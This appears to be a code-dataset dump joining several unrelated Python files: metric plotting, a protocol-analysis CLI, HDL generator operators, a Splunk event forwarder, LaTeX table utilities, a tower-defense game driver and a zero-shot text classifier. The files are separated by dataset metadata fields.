def generate_precision_recall(all_data, fname):
"""
Generate an precision and recall report from all_data
Args:
all_data (dict): Dictionary of all metrics from a directory
containing all of the tests
fname (str): Filename to save the report graph
"""
plt.figure(figsize=(8,6))
models = []
precision_list = []
recall_list = []
for model_name, data in all_data.items():
models.append(model_name)
precision = []
recall = []
for key, value in data.items():
precision.append(value['precision'])
recall.append(value['recall'])
precision_list.append(precision)
recall_list.append(recall)
plt.plot(precision, recall, label = model_name)
plt.ylim(0, 1)
plt.xlim(0, 1)
plt.xlabel("Recall")
plt.ylabel("Precision")
plt.legend()
plt.grid()
plt.tight_layout()
plt.savefig(fname)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"-e",
"--eval_path",
dest="evaluation_path",
required=True,
type=str,
help="Folder path to model predictions that have been evaluated",
)
args = parser.parse_args()
path = args.evaluation_path
all_data = load_all_metrics(path)
fname = f"{path}/precision.png"
generate_report(all_data, fname, "precision")
fname = f"{path}/recall.png"
generate_report(all_data, fname, "recall")
fname = f"{path}/mrr_line.png"
generate_report(all_data, fname, "mrr_at_k")
fname = f"{path}/mrr.png"
generate_mrr(all_data, fname)
fname = f"{path}/precision_recall.png"
generate_precision_recall(all_data, fname) | en | 0.678856 | Load json file Args: path (str): Path to JSON file Returns: data (dict): Dictionary form of JSON file Load all `metrics.json` files in a directory. Args: data_path (str): Path of folder directory containing all tests Returns: all_data (dict): Dictionary form containing all data of all metrics Generate a report from all_data given a specific metric Args: all_data (dict): Dictionary of all metrics from a directory containing all of the tests fname (str): Filename to save the report graph metric (str): Metric name to evaluate in the metrics file Generate an MRR report from all_data Args: all_data (dict): Dictionary of all metrics from a directory containing all of the tests fname (str): Filename to save the report graph Generate an precision and recall report from all_data Args: all_data (dict): Dictionary of all metrics from a directory containing all of the tests fname (str): Filename to save the report graph | 3.036254 | 3 |
aqopa/cmd.py | lukaszkurantdev/AQoPA | 2 | 6623942 | '''
Created on 30-10-2013
@author: damian
'''
import optparse
import sys
import os
from aqopa import VERSION
from aqopa.bin import console, gui
def gui_command():
app = gui.AqopaApp(False)
app.MainLoop()
def console_command():
parser = optparse.OptionParser()
parser.usage = "%prog [options]"
parser.add_option("-f", "--model-file", dest="model_file", metavar="FILE",
help="specifies model file")
parser.add_option("-m", "--metrics-file", dest="metrics_file", metavar="FILE",
help="specifies file with metrics")
parser.add_option("-c", "--config-file", dest="config_file", metavar="FILE",
help="specifies file with modules configuration")
parser.add_option("-s", "--states", dest="save_states", action="store_true", default=False,
help="save states flow in a file")
parser.add_option("-p", '--progressbar', dest="show_progressbar", action="store_true", default=False,
help="show the progressbar of the simulation")
parser.add_option("-V", '--version', dest="show_version", action="store_true", default=False,
help="show version of AQoPA")
parser.add_option("-d", "--debug", dest="debug", action="store_true", default=False,
help="DEBUG mode")
(options, args) = parser.parse_args()
if options.show_version:
print "AQoPA (version %s)" % VERSION
sys.exit(0)
if not options.model_file:
parser.error("no qopml model file specified")
if not os.path.exists(options.model_file):
parser.error("qopml model file '%s' does not exist" % options.model_file)
if not options.metrics_file:
parser.error("no metrics file specified")
if not os.path.exists(options.metrics_file):
parser.error("metrics file '%s' does not exist" % options.metrics_file)
if not options.config_file:
parser.error("no configuration file specified")
if not os.path.exists(options.config_file):
parser.error("configuration file '%s' does not exist" % options.config_file)
f = open(options.model_file, 'r')
qopml_model = f.read()
f.close()
f = open(options.metrics_file, 'r')
qopml_metrics = f.read()
f.close()
f = open(options.config_file, 'r')
qopml_config = f.read()
f.close()
console.run(qopml_model, qopml_metrics, qopml_config,
save_states=options.save_states, debug=options.debug,
show_progressbar=options.show_progressbar)
| '''
Created on 30-10-2013
@author: damian
'''
import optparse
import sys
import os
from aqopa import VERSION
from aqopa.bin import console, gui
def gui_command():
app = gui.AqopaApp(False)
app.MainLoop()
def console_command():
parser = optparse.OptionParser()
parser.usage = "%prog [options]"
parser.add_option("-f", "--model-file", dest="model_file", metavar="FILE",
help="specifies model file")
parser.add_option("-m", "--metrics-file", dest="metrics_file", metavar="FILE",
help="specifies file with metrics")
parser.add_option("-c", "--config-file", dest="config_file", metavar="FILE",
help="specifies file with modules configuration")
parser.add_option("-s", "--states", dest="save_states", action="store_true", default=False,
help="save states flow in a file")
parser.add_option("-p", '--progressbar', dest="show_progressbar", action="store_true", default=False,
help="show the progressbar of the simulation")
parser.add_option("-V", '--version', dest="show_version", action="store_true", default=False,
help="show version of AQoPA")
parser.add_option("-d", "--debug", dest="debug", action="store_true", default=False,
help="DEBUG mode")
(options, args) = parser.parse_args()
if options.show_version:
print "AQoPA (version %s)" % VERSION
sys.exit(0)
if not options.model_file:
parser.error("no qopml model file specified")
if not os.path.exists(options.model_file):
parser.error("qopml model file '%s' does not exist" % options.model_file)
if not options.metrics_file:
parser.error("no metrics file specified")
if not os.path.exists(options.metrics_file):
parser.error("metrics file '%s' does not exist" % options.metrics_file)
if not options.config_file:
parser.error("no configuration file specified")
if not os.path.exists(options.config_file):
parser.error("configuration file '%s' does not exist" % options.config_file)
f = open(options.model_file, 'r')
qopml_model = f.read()
f.close()
f = open(options.metrics_file, 'r')
qopml_metrics = f.read()
f.close()
f = open(options.config_file, 'r')
qopml_config = f.read()
f.close()
console.run(qopml_model, qopml_metrics, qopml_config,
save_states=options.save_states, debug=options.debug,
show_progressbar=options.show_progressbar)
| en | 0.580341 | Created on 30-10-2013 @author: damian | 2.240026 | 2 |
tests/test_example.py | norwood867/trio-gpio | 0 | 6623943 | async def test_basic(foo):
assert foo == "bar"
| async def test_basic(foo):
assert foo == "bar"
| none | 1 | 1.327144 | 1 | |
frappe/__version__.py | indictranstech/Hospital-frappe | 0 | 6623944 | from __future__ import unicode_literals
__version__ = "6.27.18"
| from __future__ import unicode_literals
__version__ = "6.27.18"
| none | 1 | 1.056297 | 1 | |
amethyst/support/ops.py | medav/amethyst | 0 | 6623945 | from atlas import *
class BitOrReduceOperator(Operator):
"""Operator that reduces a bits signal via logic OR."""
#
# N.B. This is a good example of how extendable Atlas/Python is. It enables
# user code to create new synthesizable operations that generate custom
# Verilog code.
#
# Since Atlas doesn't currently have a good way of producing an OR reduction
# tree, we can just make our own, here!
#
def __init__(self, bits):
super().__init__('reduce_or')
self.bit_vec = [FilterFrontend(bits(i, i)) for i in range(bits.width)]
self.result = CreateSignal(
Bits(1),
name='result',
parent=self,
frontend=False)
def Declare(self):
VDeclWire(self.result)
def Synthesize(self):
add_str = ' | '.join([VName(bit) for bit in self.bit_vec])
VAssignRaw(VName(self.result), add_str)
@OpGen(default='result')
def BitOrReduce(bits):
return BitOrReduceOperator(bits)
class ValidSetOperator(Operator):
"""Operator that manages a bit array for valid flags.
N.B. Reads are not clocked (I.e. done combinationally).
"""
def __init__(self, width : int, clock=None, reset=None):
super().__init__('validset')
self.width = width
self.addrwidth = Log2Ceil(self.width)
if clock is None:
self.clock = DefaultClock()
else:
self.clock = clock
if reset is None:
self.reset = DefaultReset()
else:
self.reset = reset
self.read_ports = []
self.write_ports = []
def Get(self, addr_signal):
read_signal = CreateSignal(
Bits(1),
name=f'read_{len(self.read_ports)}',
parent=self,
frontend=False)
self.read_ports.append((FilterFrontend(addr_signal), read_signal))
return WrapSignal(read_signal)
def __getitem__(self, key):
return self.Get(key)
def Set(self, addr_signal, data_signal, enable_signal):
assert enable_signal.width == 1
assert (type(data_signal) is bool) or \
(type(data_signal) is int) or \
(data_signal.width == 1)
self.write_ports.append((
FilterFrontend(addr_signal),
FilterFrontend(data_signal),
FilterFrontend(enable_signal)))
def Declare(self):
for (addr, data) in self.read_ports:
VDeclWire(data)
def Synthesize(self):
set_name = self.name
VEmitRaw(
f'reg {set_name} [{self.width - 1} : 0];')
for (addr, data) in self.read_ports:
VAssignRaw(VName(data), f'{set_name}[{VName(addr)}]')
with VAlways([VPosedge(self.clock)]):
with VIf(self.reset):
VConnectRaw(f'{set_name}', '\'{default:0};')
with VElse():
for (addr, data, enable) in self.write_ports:
with VIf(enable):
VConnectRaw(f'{set_name}[{VName(addr)}]', VName(data))
@OpGen(cacheable=False)
def ValidSet(width : int):
return ValidSetOperator(width)
class DisplayOperator(Operator):
def __init__(self, args : list, clock=None, en=None):
super().__init__('clocked_display')
self.args = args
if clock is None:
self.clock = DefaultClock()
else:
self.clock = clock
self.en = en
def Declare(self):
pass
def Synthesize(self):
def ProcessArg(arg):
if type(arg) is str:
return f'"{arg}"'
else:
return VName(FilterFrontend(arg))
args_str = ', '.join(map(ProcessArg, self.args))
with VAlways([VPosedge(self.clock)]):
if self.en is None:
VEmitRaw(f'$display({args_str});')
else:
with VIf(FilterFrontend(self.en)):
VEmitRaw(f'$display({args_str});')
@OpGen(cacheable=False)
def Display(args : list, clock=None, en=None):
return DisplayOperator(args, clock=clock, en=en)
class ProbeOperator(Operator):
"""Operator that produces a verilog signal for probing.
The resulting signal will be marked as verilator public
"""
def __init__(self, bits, probe_name=None):
super().__init__(override_name='probe')
self.bits = FilterFrontend(bits)
self.probe_name = probe_name
self.probe = CreateSignal(
bits.meta.typespec,
name=None,
parent=self,
frontend=False)
def Declare(self):
if self.probe_name is not None:
self.probe.meta.name = self.probe_name
else:
self.probe.meta.name = self.bits.meta.name
width_str = \
f'[{self.probe.width - 1} : 0]' if self.probe.width > 1 else ''
VEmitRaw(
f'wire {width_str} {VName(self.probe)} /* verilator public */;')
def Synthesize(self):
VAssign(self.probe, self.bits)
@OpGen(cacheable=False)
def Probe(bits, name=None):
return ProbeOperator(bits, probe_name=name)
| from atlas import *
class BitOrReduceOperator(Operator):
"""Operator that reduces a bits signal via logic OR."""
#
# N.B. This is a good example of how extendable Atlas/Python is. It enables
# user code to create new synthesizable operations that generate custom
# Verilog code.
#
# Since Atlas doesn't currently have a good way of producing an OR reduction
# tree, we can just make our own, here!
#
def __init__(self, bits):
super().__init__('reduce_or')
self.bit_vec = [FilterFrontend(bits(i, i)) for i in range(bits.width)]
self.result = CreateSignal(
Bits(1),
name='result',
parent=self,
frontend=False)
def Declare(self):
VDeclWire(self.result)
def Synthesize(self):
add_str = ' | '.join([VName(bit) for bit in self.bit_vec])
VAssignRaw(VName(self.result), add_str)
@OpGen(default='result')
def BitOrReduce(bits):
return BitOrReduceOperator(bits)
class ValidSetOperator(Operator):
"""Operator that manages a bit array for valid flags.
N.B. Reads are not clocked (I.e. done combinationally).
"""
def __init__(self, width : int, clock=None, reset=None):
super().__init__('validset')
self.width = width
self.addrwidth = Log2Ceil(self.width)
if clock is None:
self.clock = DefaultClock()
else:
self.clock = clock
if reset is None:
self.reset = DefaultReset()
else:
self.reset = reset
self.read_ports = []
self.write_ports = []
def Get(self, addr_signal):
read_signal = CreateSignal(
Bits(1),
name=f'read_{len(self.read_ports)}',
parent=self,
frontend=False)
self.read_ports.append((FilterFrontend(addr_signal), read_signal))
return WrapSignal(read_signal)
def __getitem__(self, key):
return self.Get(key)
def Set(self, addr_signal, data_signal, enable_signal):
assert enable_signal.width == 1
assert (type(data_signal) is bool) or \
(type(data_signal) is int) or \
(data_signal.width == 1)
self.write_ports.append((
FilterFrontend(addr_signal),
FilterFrontend(data_signal),
FilterFrontend(enable_signal)))
def Declare(self):
for (addr, data) in self.read_ports:
VDeclWire(data)
def Synthesize(self):
set_name = self.name
VEmitRaw(
f'reg {set_name} [{self.width - 1} : 0];')
for (addr, data) in self.read_ports:
VAssignRaw(VName(data), f'{set_name}[{VName(addr)}]')
with VAlways([VPosedge(self.clock)]):
with VIf(self.reset):
VConnectRaw(f'{set_name}', '\'{default:0};')
with VElse():
for (addr, data, enable) in self.write_ports:
with VIf(enable):
VConnectRaw(f'{set_name}[{VName(addr)}]', VName(data))
@OpGen(cacheable=False)
def ValidSet(width : int):
return ValidSetOperator(width)
class DisplayOperator(Operator):
def __init__(self, args : list, clock=None, en=None):
super().__init__('clocked_display')
self.args = args
if clock is None:
self.clock = DefaultClock()
else:
self.clock = clock
self.en = en
def Declare(self):
pass
def Synthesize(self):
def ProcessArg(arg):
if type(arg) is str:
return f'"{arg}"'
else:
return VName(FilterFrontend(arg))
args_str = ', '.join(map(ProcessArg, self.args))
with VAlways([VPosedge(self.clock)]):
if self.en is None:
VEmitRaw(f'$display({args_str});')
else:
with VIf(FilterFrontend(self.en)):
VEmitRaw(f'$display({args_str});')
@OpGen(cacheable=False)
def Display(args : list, clock=None, en=None):
return DisplayOperator(args, clock=clock, en=en)
class ProbeOperator(Operator):
"""Operator that produces a verilog signal for probing.
The resulting signal will be marked as verilator public
"""
def __init__(self, bits, probe_name=None):
super().__init__(override_name='probe')
self.bits = FilterFrontend(bits)
self.probe_name = probe_name
self.probe = CreateSignal(
bits.meta.typespec,
name=None,
parent=self,
frontend=False)
def Declare(self):
if self.probe_name is not None:
self.probe.meta.name = self.probe_name
else:
self.probe.meta.name = self.bits.meta.name
width_str = \
f'[{self.probe.width - 1} : 0]' if self.probe.width > 1 else ''
VEmitRaw(
f'wire {width_str} {VName(self.probe)} /* verilator public */;')
def Synthesize(self):
VAssign(self.probe, self.bits)
@OpGen(cacheable=False)
def Probe(bits, name=None):
return ProbeOperator(bits, probe_name=name)
| en | 0.87989 | Operator that reduces a bits signal via logic OR. # # N.B. This is a good example of how extendable Atlas/Python is. It enables # user code to create new synthesizable operations that generate custom # Verilog code. # # Since Atlas doesn't currently have a good way of producing an OR reduction # tree, we can just make our own, here! # Operator that manages a bit array for valid flags.
N.B. Reads are not clocked (I.e. done combinationally). Operator that produces a verilog signal for probing.
The resulting signal will be marked as verilator public | 3.101837 | 3 |
splunkforwarder.py | iamnavpreet/httpsplunkforwarder | 0 | 6623946 | import json
import requests
class SplunkForwarder:
def __init__(self, authorization_token, splunk_ingester_domain, connection_port='443'):
assert 'http' in splunk_ingester_domain
assert authorization_token
self.token = authorization_token
self.ingester_url = "{}:{}{}".format(splunk_ingester_domain, connection_port, "/services/collector/event")
self.port = connection_port
def build_metadata(self, index_name=None, **other_metadata):
metadata = dict()
if index_name:
metadata["index"] = index_name
if other_metadata:
metadata.update(other_metadata)
def send(self):
headers = dict()
headers['Authorization'] = 'Splunk {}'.format(self.token)
if hasattr(self, "payload") and self.payload:
response = requests.post(self.ingester_url, data=self.payload, headers=headers)
if response.status_code != 200:
print("Issues in sending to splunk - URL -> {}".format(self.ingester_url))
def build_payload(self, events, metadata):
if isinstance(events, list):
concatenated_payload = ""
for event in events:
payload = dict()
payload["host"] = self.ingester_url
payload["event"] = event
if metadata:
payload.update(metadata)
concatenated_payload += json.dumps(payload)
if concatenated_payload:
setattr(self, "payload", concatenated_payload)
# r = requests.post(self.ingester_url?, data=concatenated_payload, headers=headers)
else:
payload = dict()
payload["host"] = self.ingester_url
payload["event"] = events
if metadata:
payload.update(metadata)
setattr(self, "payload", json.dumps(payload))
| import json
import requests
class SplunkForwarder:
    """Forward events to a Splunk HTTP Event Collector (HEC) endpoint.

    Payloads are POSTed to ``<domain>:<port>/services/collector/event`` with a
    ``Splunk <token>`` Authorization header.
    """

    def __init__(self, authorization_token, splunk_ingester_domain, connection_port='443'):
        # The domain must already carry its scheme, e.g. "https://splunk.example.com".
        assert 'http' in splunk_ingester_domain
        assert authorization_token
        self.token = authorization_token
        self.ingester_url = "{}:{}{}".format(splunk_ingester_domain, connection_port, "/services/collector/event")
        self.port = connection_port

    def build_metadata(self, index_name=None, **other_metadata):
        """Build and return a metadata dict to merge into each event payload.

        Fix: the original built the dict but never returned it, so callers
        always received ``None``.
        """
        metadata = dict()
        if index_name:
            metadata["index"] = index_name
        if other_metadata:
            metadata.update(other_metadata)
        return metadata

    def send(self):
        """POST the payload prepared by :meth:`build_payload` to Splunk.

        Does nothing if no (non-empty) payload has been built yet.
        """
        headers = dict()
        headers['Authorization'] = 'Splunk {}'.format(self.token)
        if hasattr(self, "payload") and self.payload:
            response = requests.post(self.ingester_url, data=self.payload, headers=headers)
            if response.status_code != 200:
                print("Issues in sending to splunk - URL -> {}".format(self.ingester_url))

    def build_payload(self, events, metadata):
        """Serialise one event (dict) or a list of events into ``self.payload``.

        A list becomes concatenated JSON objects (accepted by HEC as a batch);
        *metadata* keys are merged into every event envelope.
        """
        if isinstance(events, list):
            concatenated_payload = ""
            for event in events:
                payload = dict()
                payload["host"] = self.ingester_url
                payload["event"] = event
                if metadata:
                    payload.update(metadata)
                concatenated_payload += json.dumps(payload)
            if concatenated_payload:
                setattr(self, "payload", concatenated_payload)
        else:
            payload = dict()
            payload["host"] = self.ingester_url
            payload["event"] = events
            if metadata:
                payload.update(metadata)
            setattr(self, "payload", json.dumps(payload))
| en | 0.486251 | # r = requests.post(self.ingester_url?, data=concatenated_payload, headers=headers) | 2.55287 | 3 |
xlstotex/utils.py | tjkessler/xlstotex | 0 | 6623947 | <gh_stars>0
from csv import DictReader
def construct_header(line: dict) -> str:
    """Build the LaTeX tabular header row from the keys of *line*.

    Fix: the return annotation claimed ``list`` but a string is returned, and
    the parameter is a mapping (its ``.keys()`` are the column names).
    """
    # Column names separated by the LaTeX column separator.
    cells = ' & '.join(line.keys())
    return r'\hline \\[-3.6 ex] ' + cells + r' \\' + r' [0.2 ex] \hline \\ [-3 ex]'
def construct_table(header: str, lines: list, col_widths: tuple) -> str:
    """Assemble a complete LaTeX ``tabular`` environment.

    *header* and each entry of *lines* are pre-rendered LaTeX rows;
    *col_widths* gives one column width (in px) per column.
    """
    # Column specification: one fixed-width "p{<w>px}" cell per column.
    col_spec = ' '.join(r'p{' + str(width) + 'px}' for width in col_widths)
    rows = [r'\begin{tabular}{' + col_spec + r'}']
    rows.append(' ' + header)
    rows.extend(' ' + entry for entry in lines)
    rows.append(r'\end{tabular}')
    return '\n'.join(rows)
def determine_col_widths(rows: list) -> tuple:
    """Estimate a pixel width per column: 8 px per character of the widest
    entry (header key or any row value in that column), plus 1 px padding.

    *rows* must be non-empty; the first row supplies the column names.
    """
    columns = list(rows[0].keys())
    widths = []
    for column in columns:
        widest = len(column)
        for row in rows:
            widest = max(widest, len(row[column]))
        widths.append(8 * widest + 1)
    return tuple(widths)
def parse_line(line: dict) -> str:
    """Render one table row: the values of *line* joined by ``&`` and
    terminated with a LaTeX row break.

    Fix: the parameter annotation said ``list`` but the function consumes a
    mapping (it joins the values in key order).
    """
    return ' & '.join(line.values()) + r' \\'
def read_csv(filename: str, encoding: str = 'utf8') -> list:
    """Read a CSV file and return its rows as dicts keyed by the header row.

    Fix: dropped the redundant explicit ``close()`` — the ``with`` block
    already closes the file.
    """
    with open(filename, 'r', encoding=encoding) as csv_file:
        return list(DictReader(csv_file))
def write_txt(content: str, filename: str):
    """Write *content* to *filename*, replacing any existing file.

    Fix: dropped the redundant explicit ``close()`` inside the ``with`` block.
    """
    with open(filename, 'w') as txt_file:
        txt_file.write(content)
from csv import DictReader
def construct_header(line: dict) -> str:
    """Build the LaTeX tabular header row from the keys of *line*.

    Fix: the return annotation claimed ``list`` but a string is returned, and
    the parameter is a mapping (its ``.keys()`` are the column names).
    """
    cells = ' & '.join(line.keys())
    return r'\hline \\[-3.6 ex] ' + cells + r' \\' + r' [0.2 ex] \hline \\ [-3 ex]'
def construct_table(header: str, lines: list, col_widths: tuple) -> str:
    """Assemble a complete LaTeX ``tabular`` environment from pre-rendered rows."""
    col_spec = ' '.join(r'p{' + str(width) + 'px}' for width in col_widths)
    parts = [r'\begin{tabular}{' + col_spec + r'}', ' ' + header]
    for entry in lines:
        parts.append(' ' + entry)
    parts.append(r'\end{tabular}')
    return '\n'.join(parts)
def determine_col_widths(rows: list) -> tuple:
    """Pixel width per column: 8 px per character of the widest entry
    (column name or any row value), plus 1 px padding.

    *rows* must be non-empty; the first row supplies the column names.
    """
    result = []
    for name in rows[0].keys():
        longest = max([len(name)] + [len(row[name]) for row in rows])
        result.append(8 * longest + 1)
    return tuple(result)
def parse_line(line: dict) -> str:
    """Render one table row: the values of *line* joined by ``&`` and
    terminated with a LaTeX row break.

    Fix: the parameter annotation said ``list`` but the function consumes a
    mapping (it joins the values in key order).
    """
    return ' & '.join(line.values()) + r' \\'
def read_csv(filename: str, encoding: str = 'utf8') -> list:
    """Read a CSV file and return its rows as dicts keyed by the header row.

    Fix: dropped the redundant explicit ``close()`` — the ``with`` block
    already closes the file.
    """
    with open(filename, 'r', encoding=encoding) as csv_file:
        return list(DictReader(csv_file))
def write_txt(content: str, filename: str):
    """Write *content* to *filename*, replacing any existing file.

    Fix: dropped the redundant explicit ``close()`` inside the ``with`` block
    (and the dataset junk fused onto the final line).
    """
    with open(filename, 'w') as txt_file:
        txt_file.write(content)
tests/file/test_path.py | anchoranalysis/anchor-python-utilities | 0 | 6623948 | <reponame>anchoranalysis/anchor-python-utilities<gh_stars>0
"""Tests :mod:`file.path`"""
from anchor_python_utilities import file
import os
def test_path_same_directory() -> None:
    """path_same_directory should place the file name in the directory of the first path."""
    expected = os.path.join("go", "b.txt")
    assert file.path_same_directory("go/a", "b.txt") == expected
| """Tests :mod:`file.path`"""
from anchor_python_utilities import file
import os
def test_path_same_directory() -> None:
    """path_same_directory should place the file name in the directory of the first path."""
    expected = os.path.join("go", "b.txt")
    assert file.path_same_directory("go/a", "b.txt") == expected
AI_Tower_Defense/src/main.py | aasquier/AI_Tower_Defense | 0 | 6623949 | import pygame
from enum import Enum
from game.game import Game
from experiment.qLearning.serialQLearning import SerialQLearning
from experiment.qLearning.parallelQLearning import ParallelQLearning
from experiment.geneticAlgorithm.parallelGA import ParallelGeneticAlgorithm
from experiment.geneticAlgorithm.serialGA import SerialGeneticAlgorithm
from experiment.deepQlearning import DeepQlearning
from agent.geneticAgent import GeneticAgent
from constants.gameConstants import *
class MODE(Enum):
    """Run modes for the tower-defense driver.

    Fix: the first three members had trailing commas, which made their values
    one-element tuples ((0,), (1,), (2,)) while deepQlearning was a plain int.
    All members are now consistent integers.
    """
    manual = 0
    geneticAlgorithm = 1
    qLearning = 2
    deepQlearning = 3
# Driver configuration flags, read by main() and displaySettings().
GAME_MODE = MODE.manual # Which MODE member to run the game in
PARALLEL_MODE = False # Run one game per processor core (only when VISUAL_MODE is off)
COLLECT_WHOLE_GAME_DATA = False # Whole-game data collection for the genetic algorithm
COLLECT_INNER_GAME_DATA = False # In-game data collection for the genetic algorithm
Q_TRAINING_MODE = True # Update the Q table after every game (Q-learning only)
VISUAL_MODE = True # Display graphics while running
READ_FILE = False # Load a saved model from disk and continue training from it
SAVE_TO_DISK = False # Persist collected data/models to disk
PRINT_GRAPHS = False # Save graphs of score averages
# the game expects the following signature:
# Game(visualMode, towers, gameRecord, collectInnerGameData, deepQagent)
def main():
    """Entry point: initialise pygame, print the settings, and dispatch to
    the experiment selected by the module-level GAME_MODE flag."""
    # Bring up the pygame subsystems and window title.
    pygame.init()
    pygame.font.init()
    pygame.mixer.init()
    pygame.display.set_caption("AI Tower Defense")
    displaySettings()
    # Dispatch on the configured run mode.
    if GAME_MODE == MODE.manual:
        Game(True, [], None, False, None).run()
    elif GAME_MODE == MODE.geneticAlgorithm:
        # Parallel/serial variants take the same constructor arguments.
        algo_cls = ParallelGeneticAlgorithm if PARALLEL_MODE else SerialGeneticAlgorithm
        algo = algo_cls(VISUAL_MODE, READ_FILE, SAVE_TO_DISK, PRINT_GRAPHS, COLLECT_WHOLE_GAME_DATA, COLLECT_INNER_GAME_DATA)
        algo.run()
    elif GAME_MODE == MODE.qLearning:
        learner_cls = ParallelQLearning if PARALLEL_MODE else SerialQLearning
        learner = learner_cls(VISUAL_MODE, Q_TRAINING_MODE, READ_FILE, SAVE_TO_DISK, PRINT_GRAPHS)
        learner.run()
    elif GAME_MODE == MODE.deepQlearning:
        DeepQlearning(VISUAL_MODE).run()
    pygame.quit()
def displaySettings():
    """Print the current run configuration (module-level flags) to stdout."""
    messages = [f"\n=== AI Tower Defense Settings ===", f"Game Mode: {GAME_MODE.name}"]
    if GAME_MODE.name == "qLearning":
        # Training mode is only relevant for Q-learning runs.
        messages.append(f"Training Mode: {Q_TRAINING_MODE}")
    messages.append(f"Parallel Mode: {PARALLEL_MODE}")
    messages.append(f"Visual Mode: {VISUAL_MODE}")
    messages.append(f"Load model from file: {READ_FILE}")
    messages.append(f"Save model to file: {SAVE_TO_DISK}")
    messages.append(f"Save graphs: {PRINT_GRAPHS}\n")
    for message in messages:
        print(message)
# Run the game only when this file is executed directly, not on import.
if __name__ == "__main__":
    main()
import pygame
from enum import Enum
from game.game import Game
from experiment.qLearning.serialQLearning import SerialQLearning
from experiment.qLearning.parallelQLearning import ParallelQLearning
from experiment.geneticAlgorithm.parallelGA import ParallelGeneticAlgorithm
from experiment.geneticAlgorithm.serialGA import SerialGeneticAlgorithm
from experiment.deepQlearning import DeepQlearning
from agent.geneticAgent import GeneticAgent
from constants.gameConstants import *
class MODE(Enum):
    """Run modes for the tower-defense driver.

    Fix: the first three members had trailing commas, which made their values
    one-element tuples ((0,), (1,), (2,)) while deepQlearning was a plain int.
    All members are now consistent integers.
    """
    manual = 0
    geneticAlgorithm = 1
    qLearning = 2
    deepQlearning = 3
# Driver configuration flags, read by main() and displaySettings().
GAME_MODE = MODE.manual # Which MODE member to run the game in
PARALLEL_MODE = False # Run one game per processor core (only when VISUAL_MODE is off)
COLLECT_WHOLE_GAME_DATA = False # Whole-game data collection for the genetic algorithm
COLLECT_INNER_GAME_DATA = False # In-game data collection for the genetic algorithm
Q_TRAINING_MODE = True # Update the Q table after every game (Q-learning only)
VISUAL_MODE = True # Display graphics while running
READ_FILE = False # Load a saved model from disk and continue training from it
SAVE_TO_DISK = False # Persist collected data/models to disk
PRINT_GRAPHS = False # Save graphs of score averages
# the game expects the following signature:
# Game(visualMode, towers, gameRecord, collectInnerGameData, deepQagent)
def main():
    """Entry point: initialise pygame, print the settings, and dispatch to
    the experiment selected by the module-level GAME_MODE flag."""
    # Bring up the pygame subsystems and window title.
    pygame.init()
    pygame.font.init()
    pygame.mixer.init()
    pygame.display.set_caption("AI Tower Defense")
    displaySettings()
    # Dispatch on the configured run mode.
    if GAME_MODE == MODE.manual:
        Game(True, [], None, False, None).run()
    elif GAME_MODE == MODE.geneticAlgorithm:
        # Parallel/serial variants take the same constructor arguments.
        algo_cls = ParallelGeneticAlgorithm if PARALLEL_MODE else SerialGeneticAlgorithm
        algo = algo_cls(VISUAL_MODE, READ_FILE, SAVE_TO_DISK, PRINT_GRAPHS, COLLECT_WHOLE_GAME_DATA, COLLECT_INNER_GAME_DATA)
        algo.run()
    elif GAME_MODE == MODE.qLearning:
        learner_cls = ParallelQLearning if PARALLEL_MODE else SerialQLearning
        learner = learner_cls(VISUAL_MODE, Q_TRAINING_MODE, READ_FILE, SAVE_TO_DISK, PRINT_GRAPHS)
        learner.run()
    elif GAME_MODE == MODE.deepQlearning:
        DeepQlearning(VISUAL_MODE).run()
    pygame.quit()
def displaySettings():
    """Print the current run configuration (module-level flags) to stdout."""
    messages = [f"\n=== AI Tower Defense Settings ===", f"Game Mode: {GAME_MODE.name}"]
    if GAME_MODE.name == "qLearning":
        # Training mode is only relevant for Q-learning runs.
        messages.append(f"Training Mode: {Q_TRAINING_MODE}")
    messages.append(f"Parallel Mode: {PARALLEL_MODE}")
    messages.append(f"Visual Mode: {VISUAL_MODE}")
    messages.append(f"Load model from file: {READ_FILE}")
    messages.append(f"Save model to file: {SAVE_TO_DISK}")
    messages.append(f"Save graphs: {PRINT_GRAPHS}\n")
    for message in messages:
        print(message)
# Run the game only when this file is executed directly, not on import.
if __name__ == "__main__":
    main()
| en | 0.853552 | # Select which mode to run the game in # Run a game on each processor core (only when visual_mode is off) # Game data collection for the GA # " " # Update Q table after every game # Display Graphics # Read model from file and continue training from it # Collect and store data # Prints graphs of score averages # the game expects the following signature: # Game(visualMode, towers, gameRecord, collectInnerGameData, deepQagent) Entry point for game #Setup Game # Determine game mode Displays the current game settings | 2.536092 | 3 |
Zero_shot/hg_zero_shot.py | CDU-data-science-team/zero-shot | 0 | 6623950 | <reponame>CDU-data-science-team/zero-shot
import pandas as pd
import io
import requests
from transformers import pipeline
# Read clean data (rows code XX removed) file from GitHub repo pxtextmining
# https://stackoverflow.com/questions/32400867/pandas-read-csv-from-url
url = "https://raw.githubusercontent.com/CDU-data-science-team/pxtextmining/development/datasets/text_data.csv"
# Download the CSV over HTTP and parse it from the in-memory bytes.
s = requests.get(url).content
df = pd.read_csv(io.StringIO(s.decode('utf-8')), encoding='utf-8')
# Show NA counts before and after dropping rows with missing feedback.
print(df.isna().sum())
df = df[df['feedback'].notna()] # Remove records with no feedback text
print(df.isna().sum())
# Zero-shot pipeline
# https://colab.research.google.com/drive/1jocViLorbwWIkTXKwxCOV9HLTaDDgCaw?usp=sharing
# NOTE(review): pipeline() without a model name uses Hugging Face's default
# zero-shot model, fetched remotely — results depend on that model version.
classifier = pipeline("zero-shot-classification")
sequences = df.feedback.tolist()
# Candidate labels are the unique values of the 'label' column, sorted in place.
candidate_labels = df.label.unique()
candidate_labels.sort()
# Only classify the first n_sequences feedback texts.
n_sequences = 3
zs = classifier(sequences[0:n_sequences], candidate_labels, multi_label=True) # A list of dicts with "sequence", "labels" and "scores".
# Collect per-text label scores and the top-scoring label for each text.
scores = []
class_pred = []
for i in range(0, len(zs)):
    # One single-row frame per text: columns are labels, values are scores.
    scores.append(pd.DataFrame([zs[i]['scores']], columns=zs[i]['labels']))
    max_score = max(zs[i]['scores'])
    max_index = zs[i]['scores'].index(max_score)
    class_pred.append(zs[i]['labels'][max_index])
# Stack the per-text rows and order the label columns alphabetically.
scores = pd.concat(scores)
scores = scores.reindex(sorted(scores.columns), axis=1)
scores['class_pred'] = class_pred
# Ground-truth labels for the same first n_sequences rows.
scores['class'] = df['label'][0:n_sequences].to_numpy()
print(scores)
scores.to_csv('zs_preds.csv')
import io
import requests
from transformers import pipeline
